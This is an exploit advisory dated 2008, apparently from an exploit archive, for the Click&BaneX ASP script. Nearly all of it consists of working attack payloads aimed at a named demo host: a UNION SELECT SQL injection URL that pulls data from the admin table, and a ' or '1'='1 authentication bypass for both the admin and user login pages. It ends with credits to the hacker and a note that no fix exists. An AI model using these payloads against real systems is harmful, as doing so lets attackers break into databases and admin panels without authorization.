Click&BaneX Multiple Remote SQL Injection Vulnerabilities

2008-12-15 13:00:16

############################################################################-------------------------------AlpHaNiX----------------------------------#############################################################################Found By : AlpHaNiX#website : www.offensivetrack.org#contact : AlpHa[AT]HACKER[DOT]BZ############################################################################script : Click&BaneX#download : null#Demo : http://icash.ch/ClickAndBanexDemo/user/ %00 http://icash.ch/ClickAndBanexDemo/admin/############################################################################Exploits :--=[SQL INJECTION]=--http://icash.ch/ClickAndBanexDemo/user/user_menu.asp?user=wd2505&ID=0+union+select+1,2,3,4,5,6,7,9,10,11,12,13,15,16,17+from+admin%00##########################################################################--=[AUTH BYPASS]=-------ADMIN PAGE----http://icash.ch/ClickAndBanexDemo/admin/admin_menu.aspUSERNAME : ' or '1'='1PASSWORD : ' or '1'='1-----USER PAGE----http://icash.ch/ClickAndBanexDemo/user/user_menu.aspUSERNAME : ' or '1'='1PASSWORD : ' or '1'='1#Greetz For My Best Friend ZIGMA############################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.